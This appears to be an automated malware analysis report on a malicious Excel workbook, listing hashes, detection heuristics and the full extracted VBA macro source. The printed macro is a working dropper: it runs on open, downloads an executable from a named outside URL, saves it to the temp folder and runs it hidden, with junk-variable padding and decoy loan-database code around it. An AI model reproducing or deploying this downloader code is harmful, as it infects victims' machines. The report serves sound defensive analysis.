Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dd0a05d471891124…

MALICIOUS

Office (OOXML)

64.5 KB Created: 2019-10-31 16:31:58 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2020-02-04
MD5: 9572f20b52bd6d32c0951cc3feb2f821 SHA-1: d710c4ee7d5e1b6021826cb03f8241c4ae7abf57 SHA-256: dd0a05d4718911247b9e8acafbf5b9f8f28d6f982de930d5d115eae51897940a
438 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is an Excel document containing VBA macros. The Workbook_Open macro is triggered upon opening, which constructs a URL to download a file and then executes it using WScript.Shell. The document body explicitly instructs the user to 'enable content' to view the document, acting as a lure. The VBA script reconstructs the download URL as 'http://1stchoicepestcontrol.co.za/image.exe' and saves the payload to a temporary path as 'exe.by98j'.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            .Write r.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
     se = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.by98j")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://1stchoicepestcontrol.co.za/image.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 16450 bytes
SHA-256: 99f8b179f73ae111431c8ec811b94f9ea4cf5f151ded0057c4474a426314ed26
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()

d0rfavlqmrk
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "qhm12orluum"





Sub d0rfavlqmrk()

 Dim s As String

 l = "http://1stchoicepestcontrol.co.za/image.exe"

  On Error Resume Next
 


 se = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.by98j")
 

 minus l, se
 
 


 sdfeerrff se, ""
 
 


 End
End Sub



Sub sdfeerrff(p, j)

 On Error Resume Next
 



Set w = CreateObject("WScript.Shell")
w.Run p & " " & j & " ", INVISIBLE, NOWAIT
End Sub
 Sub minus(u, f)
 On Error Resume Next
 
 Dim ob2dua5uope As Integer
Dim AA14kaks04vhr As Integer
Dim u3tut2sh5ta As Integer
Dim qebkzzladvb As Integer
Dim pch1gp2p025 As Integer
Dim sru2gzci0on As Integer
Dim AA3qfa0p0sser As Integer
Dim AA1t1gzn5kqsu As Integer
Dim zwaulqjotbo As Integer
Dim fnmg405sk13 As Integer
Dim rlcsqwrjkeh As Integer
Dim iburpnfsf1w As Integer
Dim mma3fskvkvl As Integer
Dim x0kv5fxf3qy As Integer
Dim gjaet22ap2g As Integer
Dim jsg2agy31y1 As Integer
Dim zs4qmtlizao As Integer
Dim dygp42hfkb4 As Integer
Dim u5o5ta41dmn As Integer
Dim n4ou4co5jrj As Integer


  Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
 r.Open "GET", u, False
 r.Send
 
 Dim pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej As Integer
Dim aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf As Integer
Dim zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr As Integer
Dim a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf As Long
Dim jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky As Integer

pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 837
For jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky = 0 To 5
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0wjh441b5nr45520"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky


 Set fs = CreateObject("Scripting.FileSystemObject")
  If fs.FileExists(f) Then

    pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259


    fs.DeleteFile (f)
  End If
  
  aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
'Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky

  If r.Status = 200 Then
    Set st = CreateObject("ADODB.Stream")
    
    
    pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259

    pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259

    With st
        .Type = 1
        .Open
        .Write r.ResponseBody
        .SaveToFile f
        .Close
    End With
    Set st = Nothing
  End If
 End Sub
 
 
 
Private Sub Command2_Click()
ID = txtid.Text
OpenConn
sql = "SELECT * FROM LoanManagement WHERE clng(ID)='" & ID & "'"
Set rsupdate = New ADODB.Recordset
rsupdate.Open sql, con, adOpenStatic, adLockOptimistic
If Not rsupdate.EOF Then
    With rsupdate
        !Amountpaid = txtNewAmount.Text
        !Datepaid = txtNewDate.Text
        !Amountremaining = txtAmontRemaining.Text
        .Update
    End With
        MsgBox "Record successfully updated..", vbInformation, "Success"
        fillgrid
        txtid.Text = ""
        txtAccName.Text = ""
    txtAccNo.Text = ""
     txtLoanAmount.Text = ""
     txtMonthlyRepayment.Text = ""
    txtRepayAmount.Text = ""
    txtLoanofficer.Text = ""
    txtDateIsued.Text = ""
    txtDatedue.Text = ""
    txtAmountPaid.Text = ""
    txtDatePaid.Text = ""
    txtAmountRemaining.Text = ""
    txtCollateral.Text = ""
    
End If
End Sub

Private Sub Form_Load()
Call Connect
fillgrid
End Sub

Public Function fillgrid()
Dim c As Integer
Dim r As Integer
Call Connect
Dim sql As String
rsusergrid.CursorLocation = adUseClient
'---Sql command
sql = "select * from LoanManagement"

rsusergrid.Open sql, con, adOpenKeyset, adLockOptimistic
   With FlexMember
      FlexMember.Cols = rsusergrid.Fields.Count + 1
      FlexMember.ColWidth(0) = 0
        For c = 0 To rsusergrid.Fields.Count - 1
          FlexMember.TextMatrix(0, c + 1) = rsusergrid(c).Name
        Next
      FlexMember.Rows = rsusergrid.RecordCount + 1
        For r = 1 To rsusergrid.RecordCount
           For c = 0 To rsusergrid.Fields.Count - 1
             FlexMember.TextMatrix(r, c + 1) = IIf(IsNull(rsusergrid(c).Value), "{Null}", rsusergrid(c).Value)
           Next c
          rsusergrid.MoveNext
        Next r
   End With

End Function

'CODES FOR DISPLAYING DATA IN TEXT BOXES AND IMAGE CONTROL
Private Sub FlexMember_Click()
'---first clear textboxes and image control
On Error Resume Next
 txtid.Text = ""
    txtAccName.Text = ""
    txtAccNo.Text = ""
    'txtAddress.Text = ""
    txtLoanAmount.Text = ""
    'txtInterest.Text = ""
    'cmbLoanPeriod.Text = ""
    txtMonthlyRepayment.Text = ""
    txtRepayAmount.Text = ""
    'txtBankBranch.Text = ""
    'txtIssueDate.Text = ""
    'txtOccupation.Text = ""
    'txtPhoneno.Text = ""
    'cmbLoantype.Text = ""
    txtLoanofficer.Text = ""
    txtDateIsued.Text = ""
    txtDatedue.Text = ""
    txtAmountPaid = ""
    txtDatePaid = ""
    txtAmountRemaining = ""
    txtCollateral = ""

'----then connect to database by calling that function i.e connect
Call Connect
'---then write sql command to fetch data from database
rsusergrid.Open "select * from LoanManagement", con, adOpenDynamic, adLockOptimistic
rsusergrid.MoveFirst
'---this fill the datagrid view with row from database,arranged by column number
rsusergrid.Move FlexMember.Row - 1
 txtid.Text = FlexMember.TextMatrix(FlexMember.Row, 1)
    txtAccName.Text = FlexMember.TextMatrix(FlexMember.Row, 2)
    txtAccNo.Text = FlexMember.TextMatrix(FlexMember.Row, 3)
    'txtAddress.Text = FlexMember.TextMatrix(FlexMember.Row, 4)
    txtLoanAmount.Text = FlexMember.TextMatrix(FlexMember.Row, 5)
    'txtInterest.Text = FlexMember.TextMatrix(FlexMember.Row, 6)
    'cmbLoanPeriod.Text = FlexMember.TextMatrix(FlexMember.Row, 7)
    txtMonthlyRepayment.Text = FlexMember.TextMatrix(FlexMember.Row, 8)
    txtRepayAmount.Text = FlexMember.TextMatrix(FlexMember.Row, 9)
    'txtBankBranch.Text = FlexMember.TextMatrix(FlexMember.Row, 10)
    'txtIssueDate.Text = FlexMember.TextMatrix(FlexMember.Row, 11)
    'txtOccupation.Text = FlexMember.TextMatrix(FlexMember.Row, 12)
    'txtPhoneno.Text = FlexMember.TextMatrix(FlexMember.Row, 13)
    'cmbLoantype.Text = FlexMember.TextMatrix(FlexMember.Row, 14)
    txtLoanofficer.Text = FlexMember.TextMatrix(FlexMember.Row, 15)
    txtDateIsued.Text = FlexMember.TextMatrix(FlexMember.Row, 16)
    txtDatedue.Text = FlexMember.TextMatrix(FlexMember.Row, 17)
    txtAmountPaid = FlexMember.TextMatrix(FlexMember.Row, 18)
    txtDatePaid = FlexMember.TextMatrix(FlexMember.Row, 19)
    txtAmountRemaining = FlexMember.TextMatrix(FlexMember.Row, 20)
    txtCollateral = FlexMember.TextMatrix(FlexMember.Row, 21)


End Sub



Private Sub cmdRefresh_Click()
Unload Me
End Sub

Private Sub Form_Loads()
'WHEN FORM LOAD THE FOLLOWING CODES WILL BE EXECUTED FIRST

'CODES FOR INCREMENT USER ID NUMBER IN ID TEXT BOX i.e +1
On Error Resume Next
Call Connect
con.Refresh
With rsfind
.Open "select * from LoanManagement", con, adOpenDynamic, adLockPessimistic
.MoveLast
If IsNull(.Fields("ID").Value) Then
txtid.Text = 1
Else
no = .Fields("ID") + 1
txtid.Text = no
End If
.Close
End With

Call Connect

For t = 1 To 20
        cmbLoanPeriod.AddItem t
    Next t
    cmdSave.Enabled = False
    HidePayments
End Sub


Private Sub cmdPayment_Click()
On Error Resume Next
'This section Computes the Loan Repayment
'First, it makes sure all data are supplied
'It then substitute the Data to the formular:   (P*R*T)/100
'Results obtained are Displayed on the output textboxes
'it then Disable the Payment Command, allowing the User Save Command to come up
If txtAccName = "" Then
    MsgBox "Enter Name", vbInformation
    Exit Sub
End If
If txtAccNo.Text = "" Then
    MsgBox "Enter Account Number", vbInformation
    Exit Sub
End If
If txtAddress = "" Then
    MsgBox "Enter Address", vbInformation
    Exit Sub
End If
If txtBankBranch = "" Then
    MsgBox "Enter Bank Branch", vbInformation
    Exit Sub
End If
If txtIssueDate = "" Then
    MsgBox "Enter Issue Date", vbInformation
    Exit Sub
End If
If txtOccupation = "" Then
    MsgBox "Enter Occupation", vbInformation
    Exit Sub
End If
If txtPhoneno = "" Then
    MsgBox "Enter Phone Number", vbInformation
    Exit Sub
End If
If txtLoanAmount.Text = "" Then
    MsgBox "Enter Loan Amount", vbInformation
    Exit Sub
End If
If txtInterest.Text = "" Then
    MsgBox "Set Interest", vbInformation
    Exit Sub
End If
If cmbLoanPeriod.Text = "" Then
    MsgBox "Enter Loan Period", vbInformation
    Exit Sub
End If
If txtCollateral.Text = "" Then
    MsgBox "Enter Collateral", vbInformation
    Exit Sub
End If
ShowPayments
Dim Repay As Double
Dim repayment As Double
Repay = (txtLoanAmount.Text * txtInterest.Text * cmbLoanPeriod.Text) / 100
    repayment = Format(Repay + txtLoanAmount, "##,##0.00")

    If optYears.Value = True Then
        txtMonthlyRepayment.Text = (repayment) / (cmbLoanPeriod * 12)
    End If
    If optMonths.Value = True Then
        txtMonthlyRepayment.Text = (repayment / cmbLoanPeriod)
    End If
    
        txtRepayAmount.Text = repayment
        cmdPayment.Enabled = False
        cmdSave.Enabled = True
        cmdSave.SetFocus
End Sub

Private Sub cmdSave_Click()
If txtLoanofficer.Text = "" Then
    MsgBox "Enter Name of Loan Officer", vbInformation
    Exit Sub
End If
If txtDateIsued.Text = "" Then
    MsgBox "Enter Date Issued", vbInformation
    Exit Sub
End If
If txtDatedue.Text = "" Then
    MsgBox "Enter Date due", vbInformation
    Exit Sub
End If
Call Connect
With rsuser
                    .AddNew
                    .Fields("ID") = frmAdd.txtid.Text
                    .Fields("Accountname") = frmAdd.txtAccName.Text
                    .Fields("Accountnumber") = frmAdd.txtAccNo.Text
                    .Fields("Address") = frmAdd.txtAddress.Text
                    .Fields("Amountofloan") = frmAdd.txtLoanAmount.Text
                    .Fields("interestcharged") = frmAdd.txtInterest.Text
                    .Fields("Periodofloan") = frmAdd.cmbLoanPeriod.Text
                    .Fields("Monthlyrepayment") = frmAdd.txtMonthlyRepayment.Text
                    .Fields("Totalrepayment") = frmAdd.txtRepayAmount.Text
                    .Fields("Bankbranch") = frmAdd.txtBankBranch.Text
                    .Fields("Issuedate") = frmAdd.txtIssueDate.Text
                    .Fields("Occupation") = frmAdd.txtOccupation.Text
                    .Fields("Phoneno") = frmAdd.txtPhoneno.Text
                    .Fields("Typeofloan") = frmAdd.cmbLoantype.Text
                    .Fields("Loanofficer") = frmAdd.txtLoanofficer.Text
                    .Fields("Dateissued") = frmAdd.txtDateIsued.Text
                    .Fields("Datedue") = frmAdd.txtDatedue.Text
                    .Fields("Amountremaining") = frmAdd.txtRepayAmount.Text
                    .Fields("Collateral") = frmAdd.txtCollateral.Text
                    .Update
                    .Close
                     con.Close
   End With
    '*********************************************************************
    
   'MESSAGE BOX CODES ASSOCIATED WITH ADD EVENT
   MsgBox "Information Successfully Added, Please Proceed", vbInformation, "INFORMATION"
   Dim rep
   rep = MsgBox("Do you wish to add new information ?", vbInformation + vbYesNo, "Add New Record")
   If rep = vbYes Then
      Load frmAdd
      Load Me
       frmAdd.Show
       
   Else
     Unload Me
       frmMain.Show
   End If
'***************************************************************

   'CODES FOR INCREMENT USER ID NUMBER IN ID TEXT BOX i.e +1
    On Error Resume Next
Call Connect
con.Refresh
With rsfind
.Open "select * from LoanManagement", con, adOpenDynamic, adLockPessimistic
.MoveLast
If IsNull(.Fields("ID").Value) Then
txtid.Text = 1
Else
no = .Fields("ID") + 1
txtid.Text = no
End If
.Close
End With
'**************************************
    'NO ID SHOULD FOLLOW
    txtAccName.Text = ""
    txtAccNo.Text = ""
    txtAddress.Text = ""
    txtLoanAmount.Text = ""
    txtInterest.Text = ""
    cmbLoanPeriod.Text = ""
    txtMonthlyRepayment.Text = ""
    txtRepayAmount.Text = ""
    txtBankBranch.Text = ""
    txtIssueDate.Text = ""
    txtOccupation.Text = ""
    txtPhoneno.Text = ""
    cmbLoantype.Text = ""
    txtLoanofficer.Text = ""
    txtDateIsued.Text = ""
    txtDatedue.Text = ""
End Sub
Private Sub optMonths_Click()
    'List 12 months only
    'cmbLoanPeriod.Clear
    For t = 1 To 12
        cmbLoanPeriod.AddItem t
    Next t
    If txtMonthlyRepayment.Text <> "" Then
        cmdPayment_Click
    End If
End Sub
Private Sub optYears_Click()
    'List up to 20 years
    'cmbLoanPeriod.Clear
    For t = 1 To 20
        cmbLoanPeriod.AddItem t
    Next t
    If txtMonthlyRepayment.Text <> "" Then
        cmdPayment_Click
    End If
End Sub
Private Sub txtLoanAmount_LostFocus()
    txtLoanAmount.Text = Format(txtLoanAmount.Text, "##,##0")
End Sub

Private Sub txtMonthlyRepayment_LostFocus()
    txtMonthlyRepayment.Text = Format(txtMonthlyRepayment.Text, "0.00")

End Sub

Private Sub updInterest_Change()
    txtInterest.Text = Str(updInterest.Value) '& " %"
End Sub
Sub ShowPayments()
    txtMonthlyRepayment.Visible = True
    txtRepayAmount.Visible = True
    Label1(9).Visible = True
    Label1(5).Visible = True
End Sub
Sub HidePayments()
    txtMonthlyRepayment.Visible = False
    txtRepayAmount.Visible = False
    Label1(9).Visible = False
    Label1(5).Visible = False
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 43008 bytes
SHA-256: 2bb0b0be1abf6694345889085a0bd4556761a9e2939c9bceca47fb93810e9fea
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely